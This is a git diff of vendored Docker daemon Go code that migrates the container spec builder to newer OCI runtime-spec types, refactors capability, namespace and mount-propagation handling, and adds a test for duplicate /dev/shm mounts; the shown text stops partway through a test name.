a/vendor/github.com/docker/docker/daemon/network/settings.go +++ b/vendor/github.com/docker/docker/daemon/network/settings.go @@ -1,9 +1,12 @@ -package network +package network // import "github.com/docker/docker/daemon/network" import ( + "net" + networktypes "github.com/docker/docker/api/types/network" clustertypes "github.com/docker/docker/daemon/cluster/provider" "github.com/docker/go-connections/nat" + "github.com/pkg/errors" ) // Settings stores configuration details about the daemon network config @@ -31,3 +34,36 @@ type EndpointSettings struct { *networktypes.EndpointSettings IPAMOperational bool } + +// AttachmentStore stores the load balancer IP address for a network id. +type AttachmentStore struct { + //key: networkd id + //value: load balancer ip address + networkToNodeLBIP map[string]net.IP +} + +// ResetAttachments clears any existing load balancer IP to network mapping and +// sets the mapping to the given attachments. +func (store *AttachmentStore) ResetAttachments(attachments map[string]string) error { + store.ClearAttachments() + for nid, nodeIP := range attachments { + ip, _, err := net.ParseCIDR(nodeIP) + if err != nil { + store.networkToNodeLBIP = make(map[string]net.IP) + return errors.Wrapf(err, "Failed to parse load balancer address %s", nodeIP) + } + store.networkToNodeLBIP[nid] = ip + } + return nil +} + +// ClearAttachments clears all the mappings of network to load balancer IP Address. +func (store *AttachmentStore) ClearAttachments() { + store.networkToNodeLBIP = make(map[string]net.IP) +} + +// GetIPForNetwork return the load balancer IP address for the given network. +func (store *AttachmentStore) GetIPForNetwork(networkID string) (net.IP, bool) { + ip, exists := store.networkToNodeLBIP[networkID] + return ip, exists +} diff --git a/vendor/github.com/docker/docker/daemon/oci.go b/vendor/github.com/docker/docker/daemon/oci.go new file mode 100644 index 0000000000..52050e24fa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci.go @@ -0,0 +1,78 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "fmt" + "regexp" + "strconv" + + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// nolint: gosimple +var ( + deviceCgroupRuleRegex = regexp.MustCompile("^([acb]) ([0-9]+|\\*):([0-9]+|\\*) ([rwm]{1,3})$") +) + +func setCapabilities(s *specs.Spec, c *container.Container) error { + var caplist []string + var err error + if c.HostConfig.Privileged { + caplist = caps.GetAllCapabilities() + } else { + caplist, err = caps.TweakCapabilities(s.Process.Capabilities.Bounding, c.HostConfig.CapAdd, c.HostConfig.CapDrop) + if err != nil { + return err + } + } + s.Process.Capabilities.Effective = caplist + s.Process.Capabilities.Bounding = caplist + s.Process.Capabilities.Permitted = caplist + s.Process.Capabilities.Inheritable = caplist + // setUser has already been executed here + // if non root drop capabilities in the way execve does + if s.Process.User.UID != 0 { + s.Process.Capabilities.Effective = []string{} + s.Process.Capabilities.Permitted = []string{} + } + return nil +} + +func appendDevicePermissionsFromCgroupRules(devPermissions []specs.LinuxDeviceCgroup, rules []string) ([]specs.LinuxDeviceCgroup, error) { + for _, deviceCgroupRule := range rules { + ss := deviceCgroupRuleRegex.FindAllStringSubmatch(deviceCgroupRule, -1) + if len(ss[0]) != 5 { + return nil, fmt.Errorf("invalid device cgroup rule format: '%s'", deviceCgroupRule) + } + matches := ss[0] + + dPermissions := specs.LinuxDeviceCgroup{ + Allow: true, + Type: matches[1], + Access: matches[4], + } + if matches[2] == "*" { + major := int64(-1) + dPermissions.Major = &major + } else { + major, err := strconv.ParseInt(matches[2], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid major value in device cgroup rule format: '%s'", deviceCgroupRule) + } + dPermissions.Major = &major + } + if matches[3] == "*" { + minor := int64(-1) + dPermissions.Minor = &minor + } else { + minor, err := strconv.ParseInt(matches[3], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid minor value in device cgroup rule format: '%s'", deviceCgroupRule) + } + dPermissions.Minor = &minor + } + devPermissions = append(devPermissions, dPermissions) + } + return devPermissions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go index a72b0b873d..6fb7a26dcb 100644 --- a/vendor/github.com/docker/docker/daemon/oci_linux.go +++ b/vendor/github.com/docker/docker/daemon/oci_linux.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -10,21 +10,21 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/daemon/caps" + daemonconfig "github.com/docker/docker/daemon/config" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/volume" + volumemounts "github.com/docker/docker/volume/mounts" "github.com/opencontainers/runc/libcontainer/apparmor" "github.com/opencontainers/runc/libcontainer/cgroups" "github.com/opencontainers/runc/libcontainer/devices" "github.com/opencontainers/runc/libcontainer/user" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func setResources(s *specs.Spec, r containertypes.Resources) error { @@ -50,13 +50,16 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { } memoryRes := getMemoryResources(r) - cpuRes := getCPUResources(r) + cpuRes, err := getCPUResources(r) + if err != nil { + return err + } blkioWeight := r.BlkioWeight - specResources := &specs.Resources{ + specResources := &specs.LinuxResources{ Memory: memoryRes, CPU: cpuRes, - BlockIO: &specs.BlockIO{ + BlockIO: &specs.LinuxBlockIO{ Weight: &blkioWeight, WeightDevice: weightDevices, ThrottleReadBpsDevice: readBpsDevice, @@ -64,9 +67,8 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { ThrottleReadIOPSDevice: readIOpsDevice, ThrottleWriteIOPSDevice: writeIOpsDevice, }, - DisableOOMKiller: r.OomKillDisable, - Pids: &specs.Pids{ - Limit: &r.PidsLimit, + Pids: &specs.LinuxPids{ + Limit: r.PidsLimit, }, } @@ -80,7 +82,7 @@ func setResources(s *specs.Spec, r containertypes.Resources) error { func setDevices(s *specs.Spec, c *container.Container) error { // Build lists of devices allowed and created within the container. - var devs []specs.Device + var devs []specs.LinuxDevice devPermissions := s.Linux.Resources.Devices if c.HostConfig.Privileged { hostDevices, err := devices.HostDevices() @@ -90,11 +92,10 @@ func setDevices(s *specs.Spec, c *container.Container) error { for _, d := range hostDevices { devs = append(devs, oci.Device(d)) } - rwm := "rwm" - devPermissions = []specs.DeviceCgroup{ + devPermissions = []specs.LinuxDeviceCgroup{ { Allow: true, - Access: &rwm, + Access: "rwm", }, } } else { @@ -106,6 +107,12 @@ func setDevices(s *specs.Spec, c *container.Container) error { devs = append(devs, d...) devPermissions = append(devPermissions, dPermissions...) } + + var err error + devPermissions, err = appendDevicePermissionsFromCgroupRules(devPermissions, c.HostConfig.DeviceCgroupRules) + if err != nil { + return err + } } s.Linux.Devices = append(s.Linux.Devices, devs...) @@ -113,15 +120,15 @@ func setDevices(s *specs.Spec, c *container.Container) error { return nil } -func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error { - var rlimits []specs.Rlimit +func (daemon *Daemon) setRlimits(s *specs.Spec, c *container.Container) error { + var rlimits []specs.POSIXRlimit // We want to leave the original HostConfig alone so make a copy here hostConfig := *c.HostConfig // Merge with the daemon defaults daemon.mergeUlimits(&hostConfig) for _, ul := range hostConfig.Ulimits { - rlimits = append(rlimits, specs.Rlimit{ + rlimits = append(rlimits, specs.POSIXRlimit{ Type: "RLIMIT_" + strings.ToUpper(ul.Name), Soft: uint64(ul.Soft), Hard: uint64(ul.Hard), @@ -144,7 +151,7 @@ func setUser(s *specs.Spec, c *container.Container) error { } func readUserFile(c *container.Container, p string) (io.ReadCloser, error) { - fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS) + fp, err := c.GetResourcePath(p) if err != nil { return nil, err } @@ -196,7 +203,7 @@ func getUser(c *container.Container, username string) (uint32, uint32, []uint32, return uid, gid, additionalGids, nil } -func setNamespace(s *specs.Spec, ns specs.Namespace) { +func setNamespace(s *specs.Spec, ns specs.LinuxNamespace) { for i, n := range s.Linux.Namespaces { if n.Type == ns.Type { s.Linux.Namespaces[i] = ns @@ -206,37 +213,22 @@ func setNamespace(s *specs.Spec, ns specs.Namespace) { s.Linux.Namespaces = append(s.Linux.Namespaces, ns) } -func setCapabilities(s *specs.Spec, c *container.Container) error { - var caplist []string - var err error - if c.HostConfig.Privileged { - caplist = caps.GetAllCapabilities() - } else { - caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop) - if err != nil { - return err - } - } - s.Process.Capabilities = caplist - return nil -} - func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error { userNS := false // user if c.HostConfig.UsernsMode.IsPrivate() { - uidMap, gidMap := daemon.GetUIDGIDMaps() + uidMap := daemon.idMappings.UIDs() if uidMap != nil { userNS = true - ns := specs.Namespace{Type: "user"} + ns := specs.LinuxNamespace{Type: "user"} setNamespace(s, ns) s.Linux.UIDMappings = specMapping(uidMap) - s.Linux.GIDMappings = specMapping(gidMap) + s.Linux.GIDMappings = specMapping(daemon.idMappings.GIDs()) } } // network if !c.Config.NetworkDisabled { - ns := specs.Namespace{Type: "network"} + ns := specs.LinuxNamespace{Type: "network"} parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2) if parts[0] == "container" { nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer()) @@ -246,7 +238,7 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID()) if userNS { // to share a net namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID()) setNamespace(s, nsUser) } @@ -255,10 +247,13 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error } setNamespace(s, ns) } + // ipc - if c.HostConfig.IpcMode.IsContainer() { - ns := specs.Namespace{Type: "ipc"} - ic, err := daemon.getIpcContainer(c) + ipcMode := c.HostConfig.IpcMode + switch { + case ipcMode.IsContainer(): + ns := specs.LinuxNamespace{Type: "ipc"} + ic, err := daemon.getIpcContainer(ipcMode.Container()) if err != nil { return err } @@ -266,19 +261,26 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error setNamespace(s, ns) if userNS { // to share an IPC namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID()) setNamespace(s, nsUser) } - } else if c.HostConfig.IpcMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("ipc")) - } else { - ns := specs.Namespace{Type: "ipc"} + case ipcMode.IsHost(): + oci.RemoveNamespace(s, specs.LinuxNamespaceType("ipc")) + case ipcMode.IsEmpty(): + // A container was created by an older version of the daemon. + // The default behavior used to be what is now called "shareable". + fallthrough + case ipcMode.IsPrivate(), ipcMode.IsShareable(), ipcMode.IsNone(): + ns := specs.LinuxNamespace{Type: "ipc"} setNamespace(s, ns) + default: + return fmt.Errorf("Invalid IPC mode: %v", ipcMode) } + // pid if c.HostConfig.PidMode.IsContainer() { - ns := specs.Namespace{Type: "pid"} + ns := specs.LinuxNamespace{Type: "pid"} pc, err := daemon.getPidContainer(c) if err != nil { return err @@ -287,29 +289,29 @@ func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error setNamespace(s, ns) if userNS { // to share a PID namespace, they must also share a user namespace - nsUser := specs.Namespace{Type: "user"} + nsUser := specs.LinuxNamespace{Type: "user"} nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID()) setNamespace(s, nsUser) } } else if c.HostConfig.PidMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("pid")) + oci.RemoveNamespace(s, specs.LinuxNamespaceType("pid")) } else { - ns := specs.Namespace{Type: "pid"} + ns := specs.LinuxNamespace{Type: "pid"} setNamespace(s, ns) } // uts if c.HostConfig.UTSMode.IsHost() { - oci.RemoveNamespace(s, specs.NamespaceType("uts")) + oci.RemoveNamespace(s, specs.LinuxNamespaceType("uts")) s.Hostname = "" } return nil } -func specMapping(s []idtools.IDMap) []specs.IDMapping { - var ids []specs.IDMapping +func specMapping(s []idtools.IDMap) []specs.LinuxIDMapping { + var ids []specs.LinuxIDMapping for _, item := range s { - ids = append(ids, specs.IDMapping{ + ids = append(ids, specs.LinuxIDMapping{ HostID: uint32(item.HostID), ContainerID: uint32(item.ContainerID), Size: uint32(item.Size), @@ -318,15 +320,6 @@ func specMapping(s []idtools.IDMap) []specs.IDMapping { return ids } -func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info { - for _, m := range mountinfo { - if m.Mountpoint == dir { - return m - } - } - return nil -} - // Get the source mount point of directory passed in as argument. Also return // optional fields. func getSourceMount(source string) (string, string, error) { @@ -336,84 +329,101 @@ func getSourceMount(source string) (string, string, error) { return "", "", err } - mountinfos, err := mount.GetMounts() + mi, err := mount.GetMounts(mount.ParentsFilter(sourcePath)) if err != nil { return "", "", err } - - mountinfo := getMountInfo(mountinfos, sourcePath) - if mountinfo != nil { - return sourcePath, mountinfo.Optional, nil + if len(mi) < 1 { + return "", "", fmt.Errorf("Can't find mount point of %s", source) } - path := sourcePath - for { - path = filepath.Dir(path) - - mountinfo = getMountInfo(mountinfos, path) - if mountinfo != nil { - return path, mountinfo.Optional, nil + // find the longest mount point + var idx, maxlen int + for i := range mi { + if len(mi[i].Mountpoint) > maxlen { + maxlen = len(mi[i].Mountpoint) + idx = i } + } + return mi[idx].Mountpoint, mi[idx].Optional, nil +} + +const ( + sharedPropagationOption = "shared:" + slavePropagationOption = "master:" +) - if path == "/" { - break +// hasMountinfoOption checks if any of the passed any of the given option values +// are set in the passed in option string. +func hasMountinfoOption(opts string, vals ...string) bool { + for _, opt := range strings.Split(opts, " ") { + for _, val := range vals { + if strings.HasPrefix(opt, val) { + return true + } } } - - // If we are here, we did not find parent mount. Something is wrong. - return "", "", fmt.Errorf("Could not find source mount of %s", source) + return false } // Ensure mount point on which path is mounted, is shared. func ensureShared(path string) error { - sharedMount := false - sourceMount, optionalOpts, err := getSourceMount(path) if err != nil { return err } // Make sure source mount point is shared. - optsSplit := strings.Split(optionalOpts, " ") - for _, opt := range optsSplit { - if strings.HasPrefix(opt, "shared:") { - sharedMount = true - break - } - } - - if !sharedMount { - return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount) + if !hasMountinfoOption(optionalOpts, sharedPropagationOption) { + return errors.Errorf("path %s is mounted on %s but it is not a shared mount", path, sourceMount) } return nil } // Ensure mount point on which path is mounted, is either shared or slave. func ensureSharedOrSlave(path string) error { - sharedMount := false - slaveMount := false - sourceMount, optionalOpts, err := getSourceMount(path) if err != nil { return err } - // Make sure source mount point is shared. - optsSplit := strings.Split(optionalOpts, " ") - for _, opt := range optsSplit { - if strings.HasPrefix(opt, "shared:") { - sharedMount = true - break - } else if strings.HasPrefix(opt, "master:") { - slaveMount = true - break - } - } - if !sharedMount && !slaveMount { - return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount) + if !hasMountinfoOption(optionalOpts, sharedPropagationOption, slavePropagationOption) { + return errors.Errorf("path %s is mounted on %s but it is not a shared or slave mount", path, sourceMount) } return nil } +// Get the set of mount flags that are set on the mount that contains the given +// path and are locked by CL_UNPRIVILEGED. This is necessary to ensure that +// bind-mounting "with options" will not fail with user namespaces, due to +// kernel restrictions that require user namespace mounts to preserve +// CL_UNPRIVILEGED locked flags. +func getUnprivilegedMountFlags(path string) ([]string, error) { + var statfs unix.Statfs_t + if err := unix.Statfs(path, &statfs); err != nil { + return nil, err + } + + // The set of keys come from https://github.com/torvalds/linux/blob/v4.13/fs/namespace.c#L1034-L1048. + unprivilegedFlags := map[uint64]string{ + unix.MS_RDONLY: "ro", + unix.MS_NODEV: "nodev", + unix.MS_NOEXEC: "noexec", + unix.MS_NOSUID: "nosuid", + unix.MS_NOATIME: "noatime", + unix.MS_RELATIME: "relatime", + unix.MS_NODIRATIME: "nodiratime", + } + + var flags []string + for mask, flag := range unprivilegedFlags { + if uint64(statfs.Flags)&mask == mask { + flags = append(flags, flag) + } + } + + return flags, nil +} + var ( mountPropagationMap = map[string]int{ "private": mount.PRIVATE, @@ -434,35 +444,66 @@ var ( } ) +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case sensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if s == ss { + return true + } + } + return false +} + func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error { userMounts := make(map[string]struct{}) for _, m := range mounts { userMounts[m.Destination] = struct{}{} } - // Filter out mounts that are overridden by user supplied mounts - var defaultMounts []specs.Mount + // Copy all mounts from spec to defaultMounts, except for + // - mounts overriden by a user supplied mount; + // - all mounts under /dev if a user supplied /dev is present; + // - /dev/shm, in case IpcMode is none. + // While at it, also + // - set size for /dev/shm from shmsize. + defaultMounts := s.Mounts[:0] _, mountDev := userMounts["/dev"] for _, m := range s.Mounts { - if _, ok := userMounts[m.Destination]; !ok { - if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + if _, ok := userMounts[m.Destination]; ok { + // filter out mount overridden by a user supplied mount + continue + } + if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + // filter out everything under /dev if /dev is user-mounted + continue + } + + if m.Destination == "/dev/shm" { + if c.HostConfig.IpcMode.IsNone() { + // filter out /dev/shm for "none" IpcMode continue } - defaultMounts = append(defaultMounts, m) + // set size for /dev/shm mount from spec + sizeOpt := "size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10) + m.Options = append(m.Options, sizeOpt) } + + defaultMounts = append(defaultMounts, m) } s.Mounts = defaultMounts for _, m := range mounts { for _, cm := range s.Mounts { if cm.Destination == m.Destination { - return fmt.Errorf("Duplicate mount point '%s'", m.Destination) + return duplicateMountPointError(m.Destination) } } if m.Source == "tmpfs" { data := m.Data - options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)} + parser := volumemounts.NewParser("linux") + options := []string{"noexec", "nosuid", "nodev", string(parser.DefaultPropagationMode())} if data != "" { options = append(options, strings.Split(data, ",")...) } @@ -486,7 +527,8 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c // // For private volumes any root propagation value should work. pFlag := mountPropagationMap[m.Propagation] - if pFlag == mount.SHARED || pFlag == mount.RSHARED { + switch pFlag { + case mount.SHARED, mount.RSHARED: if err := ensureShared(m.Source); err != nil { return err } @@ -494,13 +536,34 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c if rootpg != mount.SHARED && rootpg != mount.RSHARED { s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED] } - } else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE { + case mount.SLAVE, mount.RSLAVE: + var fallback bool if err := ensureSharedOrSlave(m.Source); err != nil { - return err + // For backwards compatability purposes, treat mounts from the daemon root + // as special since we automatically add rslave propagation to these mounts + // when the user did not set anything, so we should fallback to the old + // behavior which is to use private propagation which is normally the + // default. + if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) { + return err + } + + cm, ok := c.MountPoints[m.Destination] + if !ok { + return err + } + if cm.Spec.BindOptions != nil && cm.Spec.BindOptions.Propagation != "" { + // This means the user explicitly set a propagation, do not fallback in that case. + return err + } + fallback = true + logrus.WithField("container", c.ID).WithField("source", m.Source).Warn("Falling back to default propagation for bind source in daemon root") } - rootpg := mountPropagationMap[s.Linux.RootfsPropagation] - if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { - s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + if !fallback { + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + } } } @@ -512,6 +575,19 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c opts = append(opts, mountPropagationReverseMap[pFlag]) } + // If we are using user namespaces, then we must make sure that we + // don't drop any of the CL_UNPRIVILEGED "locked" flags of the source + // "mount" when we bind-mount. The reason for this is that at the point + // when runc sets up the root filesystem, it is already inside a user + // namespace, and thus cannot change any flags that are locked. + if daemon.configStore.RemappedRoot != "" { + unprivOpts, err := getUnprivilegedMountFlags(m.Source) + if err != nil { + return err + } + opts = append(opts, unprivOpts...) + } + mt.Options = opts s.Mounts = append(s.Mounts, mt) } @@ -519,11 +595,11 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c if s.Root.Readonly { for i, m := range s.Mounts { switch m.Destination { - case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc + case "/proc", "/dev/pts", "/dev/shm", "/dev/mqueue", "/dev": continue } if _, ok := userMounts[m.Destination]; !ok { - if !stringutils.InSlice(m.Options, "ro") { + if !inSlice(m.Options, "ro") { s.Mounts[i].Options = append(s.Mounts[i].Options, "ro") } } @@ -531,12 +607,10 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c } if c.HostConfig.Privileged { - if !s.Root.Readonly { - // clear readonly for /sys - for i := range s.Mounts { - if s.Mounts[i].Destination == "/sys" { - clearReadOnly(&s.Mounts[i]) - } + // clear readonly for /sys + for i := range s.Mounts { + if s.Mounts[i].Destination == "/sys" { + clearReadOnly(&s.Mounts[i]) } } s.Linux.ReadonlyPaths = nil @@ -545,7 +619,7 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c // TODO: until a kernel/mount solution exists for handling remount in a user namespace, // we must clear the readonly flag for the cgroups mount (@mrunalp concurs) - if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged { + if uidMap := daemon.idMappings.UIDs(); uidMap != nil || c.HostConfig.Privileged { for i, m := range s.Mounts { if m.Type == "cgroup" { clearReadOnly(&s.Mounts[i]) @@ -557,16 +631,18 @@ func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []c } func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { + if c.BaseFS == nil { + return errors.New("populateCommonSpec: BaseFS of container " + c.ID + " is unexpectedly nil") + } linkedEnv, err := daemon.setupLinkedContainers(c) if err != nil { return err } - s.Root = specs.Root{ - Path: c.BaseFS, + s.Root = &specs.Root{ + Path: c.BaseFS.Path(), Readonly: c.HostConfig.ReadonlyRootfs, } - rootUID, rootGID := daemon.GetRemappedUIDGID() - if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + if err := c.SetupWorkingDirectory(daemon.idMappings.RootPair()); err != nil { return err } cwd := c.Config.WorkingDir @@ -583,8 +659,8 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) (c.HostConfig.Init == nil && daemon.configStore.Init) { s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...) var path string - if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" { - path, err = exec.LookPath(DefaultInitBinary) + if daemon.configStore.InitPath == "" { + path, err = exec.LookPath(daemonconfig.DefaultInitBinary) if err != nil { return err } @@ -592,9 +668,6 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) if daemon.configStore.InitPath != "" { path = daemon.configStore.InitPath } - if c.HostConfig.InitPath != "" { - path = c.HostConfig.InitPath - } s.Mounts = append(s.Mounts, specs.Mount{ Destination: "/dev/init", Type: "bind", @@ -611,7 +684,7 @@ func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) return nil } -func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { +func (daemon *Daemon) createSpec(c *container.Container) (retSpec *specs.Spec, err error) { s := oci.DefaultSpec() if err := daemon.populateCommonSpec(&s, c); err != nil { return nil, err @@ -637,25 +710,24 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } else { cgroupsPath = filepath.Join(parent, c.ID) } - s.Linux.CgroupsPath = &cgroupsPath + s.Linux.CgroupsPath = cgroupsPath if err := setResources(&s, c.HostConfig.Resources); err != nil { return nil, fmt.Errorf("linux runtime spec resources: %v", err) } - s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj s.Linux.Sysctl = c.HostConfig.Sysctls - p := *s.Linux.CgroupsPath + p := s.Linux.CgroupsPath if useSystemd { - initPath, err := cgroups.GetInitCgroupDir("cpu") + initPath, err := cgroups.GetInitCgroup("cpu") if err != nil { return nil, err } - p, _ = cgroups.GetThisCgroupDir("cpu") + _, err = cgroups.GetOwnCgroup("cpu") if err != nil { return nil, err } - p = filepath.Join(initPath, p) + p = filepath.Join(initPath, s.Linux.CgroupsPath) } // Clean path to guard against things like ../../../BAD @@ -670,7 +742,7 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { if err := setDevices(&s, c); err != nil { return nil, fmt.Errorf("linux runtime spec devices: %v", err) } - if err := setRlimits(daemon, &s, c); err != nil { + if err := daemon.setRlimits(&s, c); err != nil { return nil, fmt.Errorf("linux runtime spec rlimits: %v", err) } if err := setUser(&s, c); err != nil { @@ -686,10 +758,20 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { return nil, fmt.Errorf("linux seccomp: %v", err) } + if err := daemon.setupContainerMountsRoot(c); err != nil { + return nil, err + } + if err := daemon.setupIpcDirs(c); err != nil { return nil, err } + defer func() { + if err != nil { + daemon.cleanupSecretDir(c) + } + }() + if err := daemon.setupSecretDir(c); err != nil { return nil, err } @@ -699,7 +781,9 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { return nil, err } - ms = append(ms, c.IpcMounts()...) + if !c.HostConfig.IpcMode.IsPrivate() && !c.HostConfig.IpcMode.IsEmpty() { + ms = append(ms, c.IpcMounts()...) + } tmpfsMounts, err := c.TmpfsMounts() if err != nil { @@ -707,9 +791,11 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } ms = append(ms, tmpfsMounts...) - if m := c.SecretMount(); m != nil { - ms = append(ms, *m) + secretMounts, err := c.SecretMounts() + if err != nil { + return nil, err } + ms = append(ms, secretMounts...) sort.Sort(mounts(ms)) if err := setMounts(daemon, &s, c, ms); err != nil { @@ -718,14 +804,10 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { for _, ns := range s.Linux.Namespaces { if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled { - target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe")) - if err != nil { - return nil, err - } - - s.Hooks = specs.Hooks{ + target := filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe") + s.Hooks = &specs.Hooks{ Prestart: []specs.Hook{{ - Path: target, // FIXME: cross-platform + Path: target, Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()}, }}, } @@ -758,9 +840,18 @@ func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { } s.Process.SelinuxLabel = c.GetProcessLabel() s.Process.NoNewPrivileges = c.NoNewPrivileges + s.Process.OOMScoreAdj = &c.HostConfig.OomScoreAdj s.Linux.MountLabel = c.MountLabel - return (*specs.Spec)(&s), nil + // Set the masked and readonly paths with regard to the host config options if they are set. + if c.HostConfig.MaskedPaths != nil { + s.Linux.MaskedPaths = c.HostConfig.MaskedPaths + } + if c.HostConfig.ReadonlyPaths != nil { + s.Linux.ReadonlyPaths = c.HostConfig.ReadonlyPaths + } + + return &s, nil } func clearReadOnly(m *specs.Mount) { diff --git a/vendor/github.com/docker/docker/daemon/oci_linux_test.go b/vendor/github.com/docker/docker/daemon/oci_linux_test.go new file mode 100644 index 0000000000..e618951ef9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_linux_test.go @@ -0,0 +1,102 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "os" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// TestTmpfsDevShmNoDupMount checks that a user-specified /dev/shm tmpfs +// mount (as in "docker run --tmpfs /dev/shm:rw,size=NNN") does not result +// in "Duplicate mount point" error from the engine. +// https://github.com/moby/moby/issues/35455 +func TestTmpfsDevShmNoDupMount(t *testing.T) { + d := Daemon{ + // some empty structs to avoid getting a panic + // caused by a null pointer dereference + idMappings: &idtools.IDMappings{}, + configStore: &config.Config{}, + } + c := &container.Container{ + ShmPath: "foobar", // non-empty, for c.IpcMounts() to work + HostConfig: &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("shareable"), // default mode + // --tmpfs /dev/shm:rw,exec,size=NNN + Tmpfs: map[string]string{ + "/dev/shm": "rw,exec,size=1g", + }, + }, + } + + // Mimick the code flow of daemon.createSpec(), enough to reproduce the issue + ms, err := d.setupMounts(c) + assert.Check(t, err) + + ms = append(ms, c.IpcMounts()...) + + tmpfsMounts, err := c.TmpfsMounts() + assert.Check(t, err) + ms = append(ms, tmpfsMounts...) + + s := oci.DefaultSpec() + err = setMounts(&d, &s, c, ms) + assert.Check(t, err) +} + +// TestIpcPrivateVsReadonly 